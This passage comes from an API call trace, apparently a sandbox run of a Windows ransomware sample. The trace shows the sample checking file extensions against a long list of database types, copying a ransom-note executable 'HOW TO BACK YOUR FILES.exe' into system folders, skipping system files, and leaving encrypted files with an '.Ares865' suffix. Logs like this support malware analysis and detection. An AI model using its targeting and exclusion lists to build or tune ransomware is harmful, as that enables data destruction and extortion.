(lpString1="ase.sdf", lpString2="sqlite3") returned -1 [0090.247] lstrlenW (lpString="sqlitedb") returned 8 [0090.247] lstrcmpiW (lpString1="base.sdf", lpString2="sqlitedb") returned -1 [0090.247] lstrlenW (lpString="xml") returned 3 [0090.247] lstrcmpiW (lpString1="sdf", lpString2="xml") returned -1 [0090.247] lstrlenW (lpString="$er") returned 3 [0090.247] lstrcmpiW (lpString1="sdf", lpString2="$er") returned 1 [0090.247] lstrlenW (lpString="4dd") returned 3 [0090.247] lstrcmpiW (lpString1="sdf", lpString2="4dd") returned 1 [0090.248] lstrlenW (lpString="4dl") returned 3 [0090.248] lstrcmpiW (lpString1="sdf", lpString2="4dl") returned 1 [0090.248] lstrlenW (lpString="^^^") returned 3 [0090.248] lstrcmpiW (lpString1="sdf", lpString2="^^^") returned 1 [0090.248] lstrlenW (lpString="abs") returned 3 [0090.248] lstrcmpiW (lpString1="sdf", lpString2="abs") returned 1 [0090.248] lstrlenW (lpString="abx") returned 3 [0090.248] lstrcmpiW (lpString1="sdf", lpString2="abx") returned 1 [0090.248] lstrlenW (lpString="accdb") returned 5 [0090.248] lstrcmpiW (lpString1="e.sdf", lpString2="accdb") returned 1 [0090.248] lstrlenW (lpString="accdc") returned 5 [0090.248] lstrcmpiW (lpString1="e.sdf", lpString2="accdc") returned 1 [0090.248] lstrlenW (lpString="accde") returned 5 [0090.248] lstrcmpiW (lpString1="e.sdf", lpString2="accde") returned 1 [0090.248] lstrlenW (lpString="accdr") returned 5 [0090.248] lstrcmpiW (lpString1="e.sdf", lpString2="accdr") returned 1 [0090.248] lstrlenW (lpString="accdt") returned 5 [0090.248] lstrcmpiW (lpString1="e.sdf", lpString2="accdt") returned 1 [0090.248] lstrlenW (lpString="accdw") returned 5 [0090.248] lstrcmpiW (lpString1="e.sdf", lpString2="accdw") returned 1 [0090.248] lstrlenW (lpString="accft") returned 5 [0090.248] lstrcmpiW (lpString1="e.sdf", lpString2="accft") returned 1 [0090.248] lstrlenW (lpString="adb") returned 3 [0090.248] lstrcmpiW (lpString1="sdf", lpString2="adb") returned 1 [0090.248] lstrlenW (lpString="adb") returned 3 [0090.248] lstrcmpiW (lpString1="sdf", lpString2="adb") returned 1 [0090.248] lstrlenW (lpString="ade") returned 3 [0090.248] lstrcmpiW (lpString1="sdf", lpString2="ade") returned 1 [0090.248] lstrlenW (lpString="adf") returned 3 [0090.248] lstrcmpiW (lpString1="sdf", lpString2="adf") returned 1 [0090.248] lstrlenW (lpString="adn") returned 3 [0090.248] lstrcmpiW (lpString1="sdf", lpString2="adn") returned 1 [0090.248] lstrlenW (lpString="adp") returned 3 [0090.248] lstrcmpiW (lpString1="sdf", lpString2="adp") returned 1 [0090.248] lstrlenW (lpString="alf") returned 3 [0090.248] lstrcmpiW (lpString1="sdf", lpString2="alf") returned 1 [0090.248] lstrlenW (lpString="ask") returned 3 [0090.248] lstrcmpiW (lpString1="sdf", lpString2="ask") returned 1 [0090.249] lstrlenW (lpString="btr") returned 3 [0090.249] lstrcmpiW (lpString1="sdf", lpString2="btr") returned 1 [0090.249] lstrlenW (lpString="cat") returned 3 [0090.249] lstrcmpiW (lpString1="sdf", lpString2="cat") returned 1 [0090.249] lstrlenW (lpString="cdb") returned 3 [0090.249] lstrcmpiW (lpString1="sdf", lpString2="cdb") returned 1 [0090.249] lstrlenW (lpString="ckp") returned 3 [0090.249] lstrcmpiW (lpString1="sdf", lpString2="ckp") returned 1 [0090.249] lstrlenW (lpString="cma") returned 3 [0090.249] lstrcmpiW (lpString1="sdf", lpString2="cma") returned 1 [0090.249] lstrlenW (lpString="cpd") returned 3 [0090.249] lstrcmpiW (lpString1="sdf", lpString2="cpd") returned 1 [0090.249] lstrlenW (lpString="dacpac") returned 6 [0090.249] lstrcmpiW (lpString1="se.sdf", lpString2="dacpac") returned 1 [0090.249] lstrlenW (lpString="dad") returned 3 [0090.249] lstrcmpiW (lpString1="sdf", lpString2="dad") returned 1 [0090.249] lstrlenW (lpString="dadiagrams") returned 10 [0090.249] lstrcmpiW (lpString1="tabase.sdf", lpString2="dadiagrams") returned 1 [0090.249] lstrlenW (lpString="daschema") returned 8 [0090.249] lstrcmpiW (lpString1="base.sdf", lpString2="daschema") returned -1 [0090.249] lstrlenW (lpString="db-journal") returned 10 [0090.249] lstrcmpiW (lpString1="tabase.sdf", lpString2="db-journal") returned 1 [0090.249] lstrlenW (lpString="db-shm") returned 6 [0090.249] lstrcmpiW (lpString1="se.sdf", lpString2="db-shm") returned 1 [0090.249] lstrlenW (lpString="db-wal") returned 6 [0090.249] lstrcmpiW (lpString1="se.sdf", lpString2="db-wal") returned 1 [0090.249] lstrlenW (lpString="dbc") returned 3 [0090.249] lstrcmpiW (lpString1="sdf", lpString2="dbc") returned 1 [0090.249] lstrlenW (lpString="dbs") returned 3 [0090.249] lstrcmpiW (lpString1="sdf", lpString2="dbs") returned 1 [0090.249] lstrlenW (lpString="dbt") returned 3 [0090.249] lstrcmpiW (lpString1="sdf", lpString2="dbt") returned 1 [0090.249] lstrlenW (lpString="dbv") returned 3 [0090.249] lstrcmpiW (lpString1="sdf", lpString2="dbv") returned 1 [0090.249] lstrlenW (lpString="dbx") returned 3 [0090.249] lstrcmpiW (lpString1="sdf", lpString2="dbx") returned 1 [0090.249] lstrlenW (lpString="dcb") returned 3 [0090.249] lstrcmpiW (lpString1="sdf", lpString2="dcb") returned 1 [0090.249] lstrlenW (lpString="dct") returned 3 [0090.249] lstrcmpiW (lpString1="sdf", lpString2="dct") returned 1 [0090.250] lstrlenW (lpString="dcx") returned 3 [0090.250] lstrcmpiW (lpString1="sdf", lpString2="dcx") returned 1 [0090.250] lstrlenW (lpString="ddl") returned 3 [0090.250] lstrcmpiW (lpString1="sdf", lpString2="ddl") returned 1 [0090.250] lstrlenW (lpString="dlis") returned 4 [0090.250] lstrcmpiW (lpString1=".sdf", lpString2="dlis") returned -1 [0090.250] lstrlenW (lpString="dp1") returned 3 [0090.250] lstrcmpiW (lpString1="sdf", lpString2="dp1") returned 1 [0090.250] lstrlenW (lpString="dqy") returned 3 [0090.250] lstrcmpiW (lpString1="sdf", lpString2="dqy") returned 1 [0090.250] lstrlenW (lpString="dsk") returned 3 [0090.250] lstrcmpiW (lpString1="sdf", lpString2="dsk") returned 1 [0090.250] lstrlenW (lpString="dsn") returned 3 [0090.250] lstrcmpiW (lpString1="sdf", lpString2="dsn") returned 1 [0090.250] lstrlenW (lpString="dtsx") returned 4 [0090.250] lstrcmpiW (lpString1=".sdf", lpString2="dtsx") returned -1 [0090.250] lstrlenW (lpString="dxl") returned 3 [0090.250] lstrcmpiW (lpString1="sdf", lpString2="dxl") returned 1 [0090.250] lstrlenW (lpString="eco") returned 3 [0090.250] lstrcmpiW (lpString1="sdf", lpString2="eco") returned 1 [0090.250] lstrlenW (lpString="ecx") returned 3 [0090.250] lstrcmpiW (lpString1="sdf", lpString2="ecx") returned 1 [0090.250] lstrlenW (lpString="edb") returned 3 [0090.250] lstrcmpiW (lpString1="sdf", lpString2="edb") returned 1 [0090.250] lstrlenW (lpString="epim") returned 4 [0090.250] lstrcmpiW (lpString1=".sdf", lpString2="epim") returned -1 [0090.250] lstrlenW (lpString="fcd") returned 3 [0090.250] lstrcmpiW (lpString1="sdf", lpString2="fcd") returned 1 [0090.250] lstrlenW (lpString="fdb") returned 3 [0090.250] lstrcmpiW (lpString1="sdf", lpString2="fdb") returned 1 [0090.250] lstrlenW (lpString="fic") returned 3 [0090.250] lstrcmpiW (lpString1="sdf", lpString2="fic") returned 1 [0090.250] lstrlenW (lpString="flexolibrary") returned 12 [0090.250] lstrcmpiW (lpString1="Database.sdf", lpString2="flexolibrary") returned -1 [0090.250] lstrlenW (lpString="fm5") returned 3 [0090.250] lstrcmpiW (lpString1="sdf", lpString2="fm5") returned 1 [0090.250] lstrlenW (lpString="fmp") returned 3 [0090.250] lstrcmpiW (lpString1="sdf", lpString2="fmp") returned 1 [0090.250] lstrlenW (lpString="fmp12") returned 5 [0090.251] lstrcmpiW (lpString1="e.sdf", lpString2="fmp12") returned -1 [0090.251] lstrlenW (lpString="fmpsl") returned 5 [0090.251] lstrcmpiW (lpString1="e.sdf", lpString2="fmpsl") returned -1 [0090.251] lstrlenW (lpString="fol") returned 3 [0090.251] lstrcmpiW (lpString1="sdf", lpString2="fol") returned 1 [0090.251] lstrlenW (lpString="fp3") returned 3 [0090.251] lstrcmpiW (lpString1="sdf", lpString2="fp3") returned 1 [0090.251] lstrlenW (lpString="fp4") returned 3 [0090.251] lstrcmpiW (lpString1="sdf", lpString2="fp4") returned 1 [0090.251] lstrlenW (lpString="fp5") returned 3 [0090.251] lstrcmpiW (lpString1="sdf", lpString2="fp5") returned 1 [0090.251] lstrlenW (lpString="fp7") returned 3 [0090.251] lstrcmpiW (lpString1="sdf", lpString2="fp7") returned 1 [0090.251] lstrlenW (lpString="fpt") returned 3 [0090.251] lstrcmpiW (lpString1="sdf", lpString2="fpt") returned 1 [0090.251] lstrlenW (lpString="frm") returned 3 [0090.251] lstrcmpiW (lpString1="sdf", lpString2="frm") returned 1 [0090.251] lstrlenW (lpString="gdb") returned 3 [0090.251] lstrcmpiW (lpString1="sdf", lpString2="gdb") returned 1 [0090.251] lstrlenW (lpString="gdb") returned 3 [0090.251] lstrcmpiW (lpString1="sdf", lpString2="gdb") returned 1 [0090.251] lstrlenW (lpString="grdb") returned 4 [0090.251] lstrcmpiW (lpString1=".sdf", lpString2="grdb") returned -1 [0090.251] lstrlenW (lpString="gwi") returned 3 [0090.251] lstrcmpiW (lpString1="sdf", lpString2="gwi") returned 1 [0090.251] lstrlenW (lpString="hdb") returned 3 [0090.251] lstrcmpiW (lpString1="sdf", lpString2="hdb") returned 1 [0090.251] lstrlenW (lpString="his") returned 3 [0090.251] lstrcmpiW (lpString1="sdf", lpString2="his") returned 1 [0090.251] lstrlenW (lpString="ib") returned 2 [0090.251] lstrcmpiW (lpString1="df", lpString2="ib") returned -1 [0090.251] lstrlenW (lpString="idb") returned 3 [0090.251] lstrcmpiW (lpString1="sdf", lpString2="idb") returned 1 [0090.251] lstrlenW (lpString="ihx") returned 3 [0090.251] lstrcmpiW (lpString1="sdf", lpString2="ihx") returned 1 [0090.251] lstrlenW (lpString="itdb") returned 4 [0090.251] lstrcmpiW (lpString1=".sdf", lpString2="itdb") returned -1 [0090.251] lstrlenW (lpString="itw") returned 3 [0090.251] lstrcmpiW (lpString1="sdf", lpString2="itw") returned 1 [0090.251] lstrlenW (lpString="jet") returned 3 [0090.252] lstrcmpiW (lpString1="sdf", lpString2="jet") returned 1 [0090.252] lstrlenW (lpString="jtx") returned 3 [0090.252] lstrcmpiW (lpString1="sdf", lpString2="jtx") returned 1 [0090.252] lstrlenW (lpString="kdb") returned 3 [0090.252] lstrcmpiW (lpString1="sdf", lpString2="kdb") returned 1 [0090.252] lstrlenW (lpString="kexi") returned 4 [0090.252] lstrcmpiW (lpString1=".sdf", lpString2="kexi") returned -1 [0090.252] lstrlenW (lpString="kexic") returned 5 [0090.252] lstrcmpiW (lpString1="e.sdf", lpString2="kexic") returned -1 [0090.252] lstrlenW (lpString="kexis") returned 5 [0090.252] lstrcmpiW (lpString1="e.sdf", lpString2="kexis") returned -1 [0090.252] lstrlenW (lpString="lgc") returned 3 [0090.252] lstrcmpiW (lpString1="sdf", lpString2="lgc") returned 1 [0090.252] lstrlenW (lpString="lwx") returned 3 [0090.252] lstrcmpiW (lpString1="sdf", lpString2="lwx") returned 1 [0090.252] lstrlenW (lpString="maf") returned 3 [0090.252] lstrcmpiW (lpString1="sdf", lpString2="maf") returned 1 [0090.252] lstrlenW (lpString="maq") returned 3 [0090.252] lstrcmpiW (lpString1="sdf", lpString2="maq") returned 1 [0090.252] lstrlenW (lpString="mar") returned 3 [0090.252] lstrcmpiW (lpString1="sdf", lpString2="mar") returned 1 [0090.252] lstrlenW (lpString="marshal") returned 7 [0090.252] lstrcmpiW (lpString1="ase.sdf", lpString2="marshal") returned -1 [0090.252] lstrlenW (lpString="mas") returned 3 [0090.252] lstrcmpiW (lpString1="sdf", lpString2="mas") returned 1 [0090.252] lstrlenW (lpString="mav") returned 3 [0090.252] lstrcmpiW (lpString1="sdf", lpString2="mav") returned 1 [0090.252] lstrlenW (lpString="maw") returned 3 [0090.252] lstrcmpiW (lpString1="sdf", lpString2="maw") returned 1 [0090.252] lstrlenW (lpString="mdbhtml") returned 7 [0090.252] lstrcmpiW (lpString1="ase.sdf", lpString2="mdbhtml") returned -1 [0090.252] lstrlenW (lpString="mdn") returned 3 [0090.252] lstrcmpiW (lpString1="sdf", lpString2="mdn") returned 1 [0090.252] lstrlenW (lpString="mdt") returned 3 [0090.252] lstrcmpiW (lpString1="sdf", lpString2="mdt") returned 1 [0090.252] lstrlenW (lpString="mfd") returned 3 [0090.252] lstrcmpiW (lpString1="sdf", lpString2="mfd") returned 1 [0090.252] lstrlenW (lpString="mpd") returned 3 [0090.252] lstrcmpiW (lpString1="sdf", lpString2="mpd") returned 1 [0090.252] lstrlenW (lpString="mrg") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="mrg") returned 1 [0090.253] lstrlenW (lpString="mud") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="mud") returned 1 [0090.253] lstrlenW (lpString="mwb") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="mwb") returned 1 [0090.253] lstrlenW (lpString="myd") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="myd") returned 1 [0090.253] lstrlenW (lpString="ndf") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="ndf") returned 1 [0090.253] lstrlenW (lpString="nnt") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="nnt") returned 1 [0090.253] lstrlenW (lpString="nrmlib") returned 6 [0090.253] lstrcmpiW (lpString1="se.sdf", lpString2="nrmlib") returned 1 [0090.253] lstrlenW (lpString="ns2") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="ns2") returned 1 [0090.253] lstrlenW (lpString="ns3") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="ns3") returned 1 [0090.253] lstrlenW (lpString="ns4") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="ns4") returned 1 [0090.253] lstrlenW (lpString="nsf") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="nsf") returned 1 [0090.253] lstrlenW (lpString="nv") returned 2 [0090.253] lstrcmpiW (lpString1="df", lpString2="nv") returned -1 [0090.253] lstrlenW (lpString="nv2") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="nv2") returned 1 [0090.253] lstrlenW (lpString="nwdb") returned 4 [0090.253] lstrcmpiW (lpString1=".sdf", lpString2="nwdb") returned -1 [0090.253] lstrlenW (lpString="nyf") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="nyf") returned 1 [0090.253] lstrlenW (lpString="odb") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="odb") returned 1 [0090.253] lstrlenW (lpString="odb") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="odb") returned 1 [0090.253] lstrlenW (lpString="oqy") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="oqy") returned 1 [0090.253] lstrlenW (lpString="ora") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="ora") returned 1 [0090.253] lstrlenW (lpString="orx") returned 3 [0090.253] lstrcmpiW (lpString1="sdf", lpString2="orx") returned 1 [0090.254] lstrlenW (lpString="owc") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="owc") returned 1 [0090.254] lstrlenW (lpString="p96") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="p96") returned 1 [0090.254] lstrlenW (lpString="p97") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="p97") returned 1 [0090.254] lstrlenW (lpString="pan") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="pan") returned 1 [0090.254] lstrlenW (lpString="pdb") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="pdb") returned 1 [0090.254] lstrlenW (lpString="pdm") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="pdm") returned 1 [0090.254] lstrlenW (lpString="pnz") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="pnz") returned 1 [0090.254] lstrlenW (lpString="qry") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="qry") returned 1 [0090.254] lstrlenW (lpString="qvd") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="qvd") returned 1 [0090.254] lstrlenW (lpString="rbf") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="rbf") returned 1 [0090.254] lstrlenW (lpString="rctd") returned 4 [0090.254] lstrcmpiW (lpString1=".sdf", lpString2="rctd") returned -1 [0090.254] lstrlenW (lpString="rod") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="rod") returned 1 [0090.254] lstrlenW (lpString="rodx") returned 4 [0090.254] lstrcmpiW (lpString1=".sdf", lpString2="rodx") returned -1 [0090.254] lstrlenW (lpString="rpd") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="rpd") returned 1 [0090.254] lstrlenW (lpString="rsd") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="rsd") returned 1 [0090.254] lstrlenW (lpString="sas7bdat") returned 8 [0090.254] lstrcmpiW (lpString1="base.sdf", lpString2="sas7bdat") returned -1 [0090.254] lstrlenW (lpString="sbf") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="sbf") returned 1 [0090.254] lstrlenW (lpString="scx") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="scx") returned 1 [0090.254] lstrlenW (lpString="sdb") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="sdb") returned 1 [0090.254] lstrlenW (lpString="sdc") returned 3 [0090.254] lstrcmpiW (lpString1="sdf", lpString2="sdc") returned 1 [0090.255] lstrlenW (lpString="sdf") returned 3 [0090.255] lstrcmpiW (lpString1="sdf", lpString2="sdf") returned 0 [0090.255] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5d2bec40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0090.255] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.255] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a70 [0090.255] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\Outbound", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\Outbound") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\Outbound" [0090.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1908 | out: hHeap=0x2b0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0090.255] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\Outbound") returned 58 [0090.255] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\Outbound" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\Outbound") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\Outbound" [0090.255] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.255] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\Outbound\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\rac\\outbound\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.255] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.256] GetLastError () returned 0x0 [0090.256] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.256] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.256] CloseHandle (hObject=0x120) returned 1 [0090.256] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.256] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.256] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC\\Outbound\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c59d4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.256] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.256] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.256] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.256] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.257] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.257] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.257] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.257] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.257] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform" [0090.257] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0090.257] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0090.257] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform") returned 78 [0090.257] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform" [0090.257] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.257] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\officesoftwareprotectionplatform\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.258] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.258] GetLastError () returned 0x0 [0090.258] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.258] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.258] CloseHandle (hObject=0x120) returned 1 [0090.258] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.258] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.258] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x64762240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x64762240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.258] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.258] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.258] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.258] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.258] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.258] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.258] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.258] lstrcmpiW (lpString1="Cache", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.258] lstrcmpiW (lpString1="Cache", lpString2="aoldtz.exe") returned 1 [0090.259] lstrcmpiW (lpString1="Cache", lpString2=".") returned 1 [0090.259] lstrcmpiW (lpString1="Cache", lpString2="..") returned 1 [0090.259] lstrcmpiW (lpString1="Cache", lpString2="windows") returned -1 [0090.259] lstrcmpiW (lpString1="Cache", lpString2="bootmgr") returned 1 [0090.259] lstrcmpiW (lpString1="Cache", lpString2="temp") returned -1 [0090.259] lstrcmpiW (lpString1="Cache", lpString2="pagefile.sys") returned -1 [0090.259] lstrcmpiW (lpString1="Cache", lpString2="boot") returned 1 [0090.259] lstrcmpiW (lpString1="Cache", lpString2="ids.txt") returned -1 [0090.259] lstrcmpiW (lpString1="Cache", lpString2="ntuser.dat") returned -1 [0090.259] lstrcmpiW (lpString1="Cache", lpString2="perflogs") returned -1 [0090.259] lstrcmpiW (lpString1="Cache", lpString2="MSBuild") returned -1 [0090.259] lstrlenW (lpString="Cache") returned 5 [0090.259] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OfficeSoftwareProtectionPlatform\\*") returned 80 [0090.259] lstrcpyW (in: lpString1=0x2cce49e, lpString2="Cache" | out: lpString1="Cache") returned="Cache" [0090.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a48 [0090.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xaa) returned 0x2c8eb8 [0090.259] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a50 | out: ListHead=0x2e7710, ListEntry=0x2e7a50) returned 0x2e7a30 [0090.259] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.259] lstrcmpiW (lpString1="tokens.dat.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.259] lstrcmpiW (lpString1="tokens.dat.Ares865", lpString2="aoldtz.exe") returned 1 [0090.259] lstrcmpiW (lpString1="tokens.dat.Ares865", lpString2=".") returned 1 [0090.259] lstrcmpiW (lpString1="tokens.dat.Ares865", lpString2="..") returned 1 [0090.259] lstrcmpiW (lpString1="tokens.dat.Ares865", lpString2="windows") returned -1 [0090.259] lstrcmpiW (lpString1="tokens.dat.Ares865", lpString2="bootmgr") returned 1 